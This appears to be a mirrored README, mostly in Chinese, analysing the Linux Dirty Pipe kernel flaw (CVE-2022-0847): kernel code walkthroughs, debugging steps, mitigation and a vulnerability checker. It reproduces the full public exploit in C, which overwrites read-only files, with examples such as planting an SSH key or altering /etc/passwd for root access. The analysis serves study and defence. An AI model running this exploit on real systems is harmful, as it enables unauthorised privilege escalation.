CVE-2022-0847 PoC — Linux kernel 安全漏洞

Source

https://github.com/chenaotian/CVE-2022-0847

Associated Vulnerability

Title:Linux kernel 安全漏洞 (CVE-2022-0847)
Description:A flaw was found in the way the "flags" member of the new pipe buffer structure was lacking proper initialization in copy_page_to_iter_pipe and push_pipe functions in the Linux kernel and could thus contain stale values. An unprivileged local user could use this flaw to write to pages in the page cache backed by read only files and as such escalate their privileges on the system.

Description

CVE-2022-0847 POC and Docker and Analysis write up

Readme

# CVE-2022-0847 Dirty Pipe linux内核提权分析

[toc]

本文首发于华为安全公众号，这是博客版(比较完整)

首发链接:https://mp.weixin.qq.com/s/6VhWBOzJ7uu80nzFxe5jpg

## 漏洞简介

漏洞编号: CVE-2022-0847 (别名: 脏管道dirty pipe)

漏洞产品: linux kernel - splice syscall

影响版本: linux 5.8 补丁 [f6dd975583bd](https://github.com/torvalds/linux/commit/f6dd975583bd8ce088400648fd9819e4691c8958) 引入~ 5.16.11、5.15.25、5.10.102 修复

漏洞危害: 对任意可读文件写不超过一页的内容(足够了)，可本地提权。

## 环境搭建

漏洞分析docker：[chenaotian/cve-2022-0847](https://registry.hub.docker.com/r/chenaotian/cve-2022-0847) (如果还访问不了那就是我还没做好传上去)

提供了：

- 编译的有漏洞的可调式内核5.13
- qemu 、gdb、linux 内核5.13源码
- exp

启动：

```shell
cd ~/cve-2022-0847
gcc exp.c -o exp --static && cp exp ./rootfs && cd rootfs
find . | cpio -o --format=newc > ../rootfs.img
cd ../ 
./boot.sh
```

调试：

```
gdb ./vmlinux
target remote :10086
directory /root/linux-5.13
b do_splice
b copy_page_to_iter_pipe 
b pipe_write
ignore 3 15
...
p *(struct pipe_inode_info *) pipe
p (struct pipe_buffer)pipe->bufs[0]
```

## 漏洞原理

> 漏洞简要原理是，调用`splice` 函数可以通过"零拷贝"的形式将文件发送到`pipe`，代码层面的零拷贝是直接将文件缓存页(page cache)作为`pipe` 的`buf`页使用。但这里引入了一个变量未初始化漏洞，导致文件缓存页会在后续`pipe` 通道中被当成普通`pipe`缓存页而被"续写"进而被篡改。然而，在这种情况下，内核并不会将这个缓存页判定为"脏页"，短时间内(到下次重启之类的)不会刷新到磁盘。在这段时间内所有访问该文件的场景都将使用被篡改的文件缓存页，也就达成了一个"短时间内对任意可读文件任意写"的操作。可以完成本地提权。

### 漏洞发生点

根据补丁，漏洞发生点位于`copy_page_to_iter_pipe` 函数，增加了对`buf->flags`的初始化操作，所以这是一个变量未初始化漏洞。

![image-20220308170149137](img/image-20220308170149137.png)

`copy_page_to_iter_pipe`  的调用点出现在 `splice` 系统调用之中。`splice` 函数(系统调用)通过一种"零拷贝"的方法将文件内容输送到管道之中。相比传统的直接将文件内容送入管道性能更好。具体在下文介绍。

### pipe原理与pipe_write

首先，漏洞别名脏管道，先了解一下管道(`pipe`)。`pipe` 是内核提供的一个通信管道，通过`pipe/pipe2` 函数创建，返回两个文件描述符，一个用于发送数据，另一个用于接受数据，类似管道的两段，具体使用不多bb。

![image-20220309124007780](img/image-20220309124007780.png)

简单说一下在内核中的实现，通常pipe 缓存空间总长度65536 字节用页的形式进行管理，总共16页(一页4096字节)，页面之间并不连续，而是通过数组进行管理，形成一个环形链表。维护两个链表指针，一个用来写(`pipe->head`)，一个用来读(`pipe->tail`)，这里主要分析一下`pipe_write` 函数：

linux-5.13\fs\pipe.c : 400 : pipe_write

```c
static ssize_t
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
	struct file *filp = iocb->ki_filp;
	struct pipe_inode_info *pipe = filp->private_data;
	unsigned int head;
	ssize_t ret = 0;
	size_t total_len = iov_iter_count(from);
	ssize_t chars;
	bool was_empty = false;
	bool wake_next_writer = false;

	··· ···
    ··· ···
	head = pipe->head;
	was_empty = pipe_empty(head, pipe->tail);
	chars = total_len & (PAGE_SIZE-1);
	if (chars && !was_empty) { 
        //[1]pipe 缓存不为空，则尝试是否能从当前最后一页"接着"写
		unsigned int mask = pipe->ring_size - 1;
		struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
		int offset = buf->offset + buf->len; 

		if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
		    offset + chars <= PAGE_SIZE) { 
            /*[2]关键，如果PIPE_BUF_FLAG_CAN_MERGE 标志位存在，代表该页允许接着写
             *如果写入长度不会跨页，则接着写，否则直接另起一页 */
			ret = pipe_buf_confirm(pipe, buf);
			···
			ret = copy_page_from_iter(buf->page, offset, chars, from);
			···
			}
			buf->len += ret;
			···
		}
	}

	for (;;) {//[3]如果上一页没法接着写，则重新起一页
		··· ···
		head = pipe->head;
		if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
			unsigned int mask = pipe->ring_size - 1;
			struct pipe_buffer *buf = &pipe->bufs[head & mask];
			struct page *page = pipe->tmp_page;
			int copied;

			if (!page) {//[4]重新申请一个新页
				page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
				if (unlikely(!page)) {
					ret = ret ? : -ENOMEM;
					break;
				}
				pipe->tmp_page = page;
			}

			spin_lock_irq(&pipe->rd_wait.lock);

			head = pipe->head;
			··· ···
			pipe->head = head + 1;
			spin_unlock_irq(&pipe->rd_wait.lock);

			/* Insert it into the buffer array */
			buf = &pipe->bufs[head & mask];
			buf->page = page;//[5]将新申请的页放到页数组中
			buf->ops = &anon_pipe_buf_ops;
			buf->offset = 0;
			buf->len = 0;
			if (is_packetized(filp))
				buf->flags = PIPE_BUF_FLAG_PACKET;
			else
				buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
            	//[6]设置flag，默认PIPE_BUF_FLAG_CAN_MERGE
			pipe->tmp_page = NULL;

			copied = copy_page_from_iter(page, 0, PAGE_SIZE, from); 
            //[7]拷贝操作
			··· ···
			ret += copied;
			buf->offset = 0;
			buf->len = copied;

			··· ···
		}
        ··· ···
    }
	··· ···
	return ret;
}
```

1. 如果当前管道(`pipe`)中不为空(`head==tail`判定为空管道)，则说明现在管道中有未被读取的数据，则获取`head` 指针，也就是指向最新的用来写的页，查看该页的`len`、`offset`(为了找到数据结尾)。接下来尝试在当前页面续写
2. 判断 **当前页面是否带有 `PIPE_BUF_FLAG_CAN_MERGE` `flag`标记，如果不存在则不允许在当前页面续写**。或当前写入的数据拼接在之前的数据后面长度超过一页(即写入操作跨页)，如果跨页，则无法续写。
2. 如果无法在上一页续写，则另起一页
2. `alloc_page` 申请一个新的页
2. 将新的页放在数组最前面(可能会替换掉原有页面)，初始化值。
2. `buf->flag` 默认初始化为`PIPE_BUF_FLAG_CAN_MERGE` ，因为默认状态是允许页可以续写的。
2. 拷贝写入的数据，没拷贝完重复上述操作。

漏洞利用的关键就是在`splice` 中未被初始化的`PIPE_BUF_FLAG_CAN_MERGE`  `flag`标记，这代表我们能否在一个"没写完"的`pipe` 页续写。

### splice到copy_page_to_iter_pipe 

上面提到了，`pipe` 就是通过管理16 个页来作为缓存。`splice` 的零拷贝方法就是，直接用文件缓存页来替换`pipe` 中的缓存页(更改pipe缓存页指针指向文件缓存页)。

![image-20220309124515813](img/image-20220309124515813.png)

`splice` 系统调用到漏洞函数`copy_page_to_iter_pipe` 调用栈很深，具体不详细分析，调用栈如下：

- `SYSCALL_DEFINE6(splice,...)` -> `__do_sys_splice` ->  `__do_splice`-> `do_splice`
  - `splice_file_to_pipe` -> `do_splice_to`
    - `generic_file_splice_read`(`in->f_op->splice_read` 默认为 `generic_file_splice_read`)
      - `call_read_iter` -> `filemap_read`
        - `copy_page_to_iter` -> `copy_page_to_iter_pipe`

漏洞所在的`copy_page_to_iter_pipe` 函数主要做的工作就是将`pipe` 缓存页结构指向要传输的文件的文件缓存页：

linux-5.13\lib\iov_iter.c : 417 : copy_page_to_iter_pipe

```c
static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
			 struct iov_iter *i)
{
	struct pipe_inode_info *pipe = i->pipe;
	struct pipe_buffer *buf;
	unsigned int p_tail = pipe->tail;
	unsigned int p_mask = pipe->ring_size - 1;
	unsigned int i_head = i->head;
	size_t off;

	··· ···

	off = i->iov_offset;
	buf = &pipe->bufs[i_head & p_mask];//[1]获取对应的pipe 缓存页
	··· ···
	
	buf->ops = &page_cache_pipe_buf_ops;//[2]修改pipe 缓存页的相关信息指向文件缓存页
	get_page(page);
	buf->page = page;//[2]页指针指向了文件缓存页
	buf->offset = offset;//[2]offset len 等设置为当前信息(通过splice 传入参数决定)
	buf->len = bytes;

	pipe->head = i_head + 1;
	i->iov_offset = offset + bytes;
	i->head = i_head;
out:
	i->count -= bytes;
	return bytes;
}
```

1. 首先根据`pipe` 页数组环形结构，找到当前写指针(`pipe->head`) 位置
2. 将当前需要写入的页指向准备好的文件缓存页，并设置其他信息，比如`len` 是由`splice` 系统调用的传入参数决定的。这里唯独没有初始化flag，造成漏洞。

一般初始化完`pipe->bufs`长这样：

![image-20220308165052936](img/image-20220308165052936.png)

这时根据上面分析过的`pipe_write` 代码，如果重新调用`pipe_write` 向`pipe` 中写数据，写指针(`pipe->head`)  指向上图中的页，`flag` 为 `PIPE_BUF_FLAG_CAN_MERGE` ，则会认为可以接着该页继续写，只要写入长度不跨页：

```c
#define PIPE_BUF_FLAG_CAN_MERGE	0x10	/* can merge buffers */

if (chars && !was_empty) { 
        //[1]pipe 缓存不为空，则尝试是否能从当前最后一页"接着"写
		unsigned int mask = pipe->ring_size - 1;
		struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
		int offset = buf->offset + buf->len; 

    if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
                offset + chars <= PAGE_SIZE) { 
                /*[2]关键，如果PIPE_BUF_FLAG_CAN_MERGE 标志位存在，代表该页允许接着写
                 *如果写入长度不会跨页，则接着写，否则直接另起一页 */
                ret = pipe_buf_confirm(pipe, buf);
                ···
                ret = copy_page_from_iter(buf->page, offset, chars, from);
```

### linux 内核page cache机制

linux 通过将打开的文件放到缓存页之中，缓存页被使用过后也会保存一段时间避免不必要的IO操作。短时间内访问同一个文件，都会操作相同的文件缓存页，而不是反复打开。而我们通过该方法篡改了这个文件缓存页，则短时间内访问(读取)该文件的操作都会读到被我们篡改的文件缓存页上，完成利用。

## 漏洞利用

上面已经描述过了，漏洞利用过程非常简单，看懂漏洞原理即可利用。根据作者的操作，大概分为以下几步：

1. 创建一个管道
2. 将管道填充满(通过`pipe_write`)，这样所有的`buf`(`pipe` 缓存页)都初始化过了，`flag` 默认初始化为`PIPE_BUF_FLAG_CAN_MERGE`
3. 将管道清空(通过`pipe_read`)，这样通过`splice` 系统调用传送文件的时候就会使用原有的初始化过的`buf `结构。
4. 调用`splice` 函数将想要篡改的文件传送入
5. 继续向`pipe`写入内容(`pipe_write`)，这时就会覆盖到文件缓存页了，完成暂时文件篡改。

### 细节调试

第二步结束，管道填满又清空之后，可以看到bufs 结构中就是接下来未初始化内容要复用的数据：

```
p *(struct pipe_inode_info *) pipe
p (struct pipe_buffer)pipe->bufs[0]
```

![image-20220308173705037](img/image-20220308173705037.png)

`splice` 之后文件传入之后，变为，其中`flag` 未被初始化，并且这里`len` 要设置的尽量小，因为越小我们后续"续写"时能写的长度就越长，这里设置为1，偏移为我们想要篡改的起始地址，这里会将`pipe->bufs->page` 指针指向起始地址:

```
splice(fd, &offset, p[1], NULL, 1, 0);
```

![image-20220308165052936](img/image-20220308165052936.png)

再一次`pipe_write`，满足续写条件，直接在页面续写：

![image-20220308174556226](img/image-20220308174556226.png)

### exp

不是我写的，漏洞披露之中的：

```c
/* SPDX-License-Identifier: GPL-2.0 */
/*
 * Copyright 2022 CM4all GmbH / IONOS SE
 *
 * author: Max Kellermann <max.kellermann@ionos.com>
 *
 * Proof-of-concept exploit for the Dirty Pipe
 * vulnerability (CVE-2022-0847) caused by an uninitialized
 * "pipe_buffer.flags" variable.  It demonstrates how to overwrite any
 * file contents in the page cache, even if the file is not permitted
 * to be written, immutable or on a read-only mount.
 *
 * This exploit requires Linux 5.8 or later; the code path was made
 * reachable by commit f6dd975583bd ("pipe: merge
 * anon_pipe_buf*_ops").  The commit did not introduce the bug, it was
 * there before, it just provided an easy way to exploit it.
 *
 * There are two major limitations of this exploit: the offset cannot
 * be on a page boundary (it needs to write one byte before the offset
 * to add a reference to this page to the pipe), and the write cannot
 * cross a page boundary.
 *
 * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
 *
 * Further explanation: https://dirtypipe.cm4all.com/
 */

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>

#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

/**
 * Create a pipe where all "bufs" on the pipe_inode_info ring have the
 * PIPE_BUF_FLAG_CAN_MERGE flag set.
 */
static void prepare_pipe(int p[2])
{
	if (pipe(p)) abort();

	const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
	static char buffer[4096];

	/* fill the pipe completely; each pipe_buffer will now have
	   the PIPE_BUF_FLAG_CAN_MERGE flag */
	for (unsigned r = pipe_size; r > 0;) {
		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
		write(p[1], buffer, n);
		r -= n;
	}

	/* drain the pipe, freeing all pipe_buffer instances (but
	   leaving the flags initialized) */
	for (unsigned r = pipe_size; r > 0;) {
		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
		read(p[0], buffer, n);
		r -= n;
	}

	/* the pipe is now empty, and if somebody adds a new
	   pipe_buffer without initializing its "flags", the buffer
	   will be mergeable */
}

int main(int argc, char **argv)
{
	if (argc != 4) {
		fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
		return EXIT_FAILURE;
	}

	/* dumb command-line argument parser */
	const char *const path = argv[1];
	loff_t offset = strtoul(argv[2], NULL, 0);
	const char *const data = argv[3];
	const size_t data_size = strlen(data);

	if (offset % PAGE_SIZE == 0) {
		fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
		return EXIT_FAILURE;
	}

	const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
	const loff_t end_offset = offset + (loff_t)data_size;
	if (end_offset > next_page) {
		fprintf(stderr, "Sorry, cannot write across a page boundary\n");
		return EXIT_FAILURE;
	}

	/* open the input file and validate the specified offset */
	const int fd = open(path, O_RDONLY); // yes, read-only! :-)
	if (fd < 0) {
		perror("open failed");
		return EXIT_FAILURE;
	}

	struct stat st;
	if (fstat(fd, &st)) {
		perror("stat failed");
		return EXIT_FAILURE;
	}

	if (offset > st.st_size) {
		fprintf(stderr, "Offset is not inside the file\n");
		return EXIT_FAILURE;
	}

	if (end_offset > st.st_size) {
		fprintf(stderr, "Sorry, cannot enlarge the file\n");
		return EXIT_FAILURE;
	}

	/* create the pipe with all flags initialized with
	   PIPE_BUF_FLAG_CAN_MERGE */
	int p[2];
	prepare_pipe(p);

	/* splice one byte from before the specified offset into the
	   pipe; this will add a reference to the page cache, but
	   since copy_page_to_iter_pipe() does not initialize the
	   "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
	--offset;
	ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
	if (nbytes < 0) {
		perror("splice failed");
		return EXIT_FAILURE;
	}
	if (nbytes == 0) {
		fprintf(stderr, "short splice\n");
		return EXIT_FAILURE;
	}

	/* the following write will not create a new pipe_buffer, but
	   will instead write into the page cache, because of the
	   PIPE_BUF_FLAG_CAN_MERGE flag */
	nbytes = write(p[1], data, data_size);
	if (nbytes < 0) {
		perror("write failed");
		return EXIT_FAILURE;
	}
	if ((size_t)nbytes < data_size) {
		fprintf(stderr, "short write\n");
		return EXIT_FAILURE;
	}

	printf("It worked!\n");
	return EXIT_SUCCESS;
}
```

提权成功：

```shell
gcc exp.c -o exp --static
./exp file offset string
```

![image-20220308172336511](img/image-20220308172336511.png)

目前是演示了任意文件写的效果，具体利用可以修改/etc/passwd、或者sshkey 或者一些suid 文件之类的完成实际提权。这里不实际操作了(反正我又不去渗透)。

### 一些小限制(无伤大雅)

1. 无法改变文件大小(无法让文件更大)
2. 单次写入长度不能超过一页(4k)

## 缓解措施

### 建议方案

由于是内核漏洞，暂无很好的处置方案，建议升级内核到修复的版本: 5.16.11、5.15.25、5.10.102及以上。

### 漏洞验证(工具)

根据漏洞披露者发布的POC，写了一个简单的验证工具。存在漏洞输出"There is CVE-2022-0847"：

![image-20220308202244668](img/image-20220308202244668-16467449237121.png)

不存在漏洞输出"You are safe!"。

## 参考

漏洞披露：https://dirtypipe.cm4all.com/

## 阴谋论

`PIPE_BUF_FLAG_CAN_MERGE` 这个`flag` 总共就出现了5次，一次`#define` 声明，两次在`pipe_write` 里。剩下两次都在`splice` 之中：

![image-20220308211006312](img/image-20220308211006312.png)

而且根据这个变量参与的代码可知，这个变量的意义就是是否允许在当前最新`pipe` 缓存页中续写；一般`pipe` 自己申请的页，就是个普通页，续写就续写很正常。什么情况不能续写，那就是这个页不是你`pipe` 自己申请的页，你不可以随便改。所以由目前的状况来看，几乎也就`splice` 中涉及到了非`pipe` 自己申请的页。换言之，**`PIPE_BUF_FLAG_CAN_MERGE` 这个`flag` 就是为`splice` 设计的。然后你告诉我你不初始化的吗？**

所以我怀疑这漏洞，根本不是马虎....

File Snapshot


 [4.0K]  /data/pocs/e4c40e0b39d6d4138ec7a0cc85d781efe3fb52f2
├── [4.0K]  exp&checker
│   ├── [866K]  check
│   ├── [3.7K]  check.c
│   └── [4.4K]  exp.c
├── [4.0K]  img
│   ├── [ 86K]  image-20220308130957504.png
│   ├── [ 10K]  image-20220308165052936.png
│   ├── [ 45K]  image-20220308170125983.png
│   ├── [ 15K]  image-20220308170149137.png
│   ├── [ 10K]  image-20220308172336511.png
│   ├── [ 20K]  image-20220308173705037.png
│   ├── [ 23K]  image-20220308174556226.png
│   ├── [2.5K]  image-20220308202244668-16467449237121.png
│   ├── [2.5K]  image-20220308202244668.png
│   ├── [ 24K]  image-20220308202256130.png
│   ├── [ 16K]  image-20220308203402061-16467449237122.png
│   ├── [ 16K]  image-20220308203402061.png
│   ├── [ 14K]  image-20220308211006312.png
│   ├── [ 35K]  image-20220309124007780.png
│   └── [ 40K]  image-20220309124515813.png
└── [ 18K]  README.md

2 directories, 19 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!